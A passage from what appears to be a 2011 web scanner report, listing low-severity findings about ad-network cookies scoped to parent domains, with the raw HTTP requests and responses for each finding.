Connection: keep-alive
Content-Length: 60

var e9;
if (e9.displayAdFlag == true) {
e9.displayAd();
}

8.6. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=crenkcom&adSpace=ros&tagKey=2218970080&th=22201705828&tKey=undefined&size=300x250&p=6869973&a=2&flashVer=10&ver=1.20&center=1&addBlockingCategories=Survey|Pop-up|Pop-under|Expandable|Audio|Full-page|Floating|Warning&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&f=0&rnd=6884586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aCntPLO5nZclSE04SQm2X4By88RFFAT03pBuZddHX9UZaZbxujf7rOoybSWIIlj9T71qT7HTFCxEn5rmJjQGIweoYhL7ZcIC46GpoZb0xIxTAFPOWMv0yjjT0DfRmBx7FCOQANcUZcfGgPWejOqO0SAI54ZctxfPcR8iJyjyRw0jNxklmN9DO56PeZbtgSyke8ifZbyolE1wKvZblCmj877varrWIm6OOUmuodrNpbOcEkcvh4HWyZaEVgfD1ei9kXF2kKvKiZbujrlTWZaikFfA7FlrsR5pPLZaGIr3cm7eIMeEDHSj1eGQqHYmZagwfQZcIdZchkGiiZcp9VxgZcRdcnD4lAQe5WW3Bw0USJUuuNpkjXF689ZdpEO3YoXOZaBXZbpx79scc0Zb4LFDeBaA7EZc5HLLeGu23sria8EtmpTUy0x5RC7cZc05samZcaxJcsisCbtj0gg2AcVvfZc88q7pDQTfJ0OCIWLj54FOnLEOpFIZdsSTZd9xmDBdvpDXTEIfulbw4opYeACDD6UU657PNkKoIXNw8IJxPeHv63Ds7Zd7B9eo3uwhvNphv7oNYZbPwgHsuATcxmmd5IGFR4Tmew9woN2MJFE9XW26MABjFeYQu0HPWCfgpJfynY8tCX6XDm7mfBB1fZcnAK2qm4JmbW2SOjtT3uQx2VDtlabL28jFVdLsAB9ZcZbI9uJdvgEavoeH6W29PxmyLyyeN5LtYsvIoI5Cy2AoqNIG0DOPsdbshQZaU0j5Uf86QlDd0HxEZdsALr7okDZdJw2kr9N4dIUcuntgfaYcsquI6y

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnteZaRkPN7RyK3AbHMZasF4sP2KljaU43iokocYcZanZaffVfSqVtMFK2IERIZdlS1sxiMGfTECMgE2MA4bLecZcZbesHT1ky6f5n3qpIDfZbnvvVv7VofnZasAYbp9lI784xl4ZcZb6YKwssIJrU5Y2dMSTfx6ZbPNGdZdy49kwUVOZcbZclLbjAhBa6BwnySEfw88clIkZcTwmJp2GabLvbb7oKoGP8UQu131I7ZdhbuEvexVkZcw8lLNsbBUca1Zc0vfnQ6vZdZcV5fa84hJs7LQfxweiawgxBM88rvhvTU6Zcp94EG20YR6D7oPPZdxh1BU8pyAjXvtDaDrvJsVPrGTZaxdwXv9b25uoZdZbX7B9lmVGW8i4PtbTZaF2ZaMs2ZcHXDB6rl2AsBvkZd1tVPdoiZdZdOlDUNXauxqk4WYYyP8m5Eq0pbNpWMDNNdOrdIvygS3ZaSwGFR0Xm2MgbDZbdy9YY5amRCUuT5WHhhwjomrWFsqtL6V3qHQjO27gRRIsVoZd1R8YbdNPCcvNbGGKiVZbgUWcguaiYPdZdAYoOaQCgCOYUDpC1a0pJKE6UilOxa6cmPW1MEr83ZbqCDpZbKVkG1sdvmLBlf6LGPjUMBnKl2e0DE8JolffM5jFO7tgqwbjigs6qnZbZd5scTZdZc1Zc5yZc7ivc2Zb1aZdQp70J2kAvJchH4FwVIZb2UZdZbaoiRFn46qZdFj0ucy2I6RsPryvxeVPYsHv0bqfZd9s5D9OqOGcZcZd6l7AolO182aRZdMxtZboqORJXZdJA67lCBXg4Zd9LS8rGT9JK1RC6uH1Q5qFW2Ue; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:01 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 187

document.write('<iframe src="http://routenote.com/blog/TFadvertising/300.htm" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');

8.7. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm/rtb/COFC/1008A2/imp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm/rtb/COFC/1008A2/imp?ci=&li=&pe=&pt=&pi=&sc=&ct=&vi=&px=&su= HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTk2NDY1MzI1NDQwMzEvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHBmNzUtYWowd0pHOHN5dWFTWnc1Qm8v/eM1wOfWIxZ9RKD_2JFr8hJB1kM4&price=TcvhHwAGrxsK7Fqwx8QugpKAEgOl8KAu6D5byA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3GM9H-HLTZveGrC1sQeC3ZC-DNzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCxg_AAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtxXQhDQNGr4Rg9Q9u2Yp7R_clKOjA%26client%3Dca-pub-3629939364375984%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207074

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7846 30790
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:33:21 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1305207201; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:33:21 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

8.8. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=24 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchC8%2BnFErGMroprw0puXfB1vgF095J6SqH0HwktuxyES5Dxtf1yi0O6gD7y3l58byfxxBeostIiIEE1JWUraHxx8Hn8wU%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

8.9. http://ads.adbrite.com/adserver/behavioral-data/8203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8203

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8203?d=2716 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; vsd=0@1@4dcbc6b1@cdn.turn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnm5TfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:31:36 GMT
Set-Cookie: vsd=0@1@4dcbe138@bcp.crwdcntrl.net; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:31:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

8.10. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1245872D28820110329161145&pub=un15138&flash=10&time=4|8:31|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=$CTURL$&r=0.510057557374239 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=14A30400-7732-07F8-1209-989000080200; PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1808
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-4033-E2F7-1209-9890000A0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:2|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-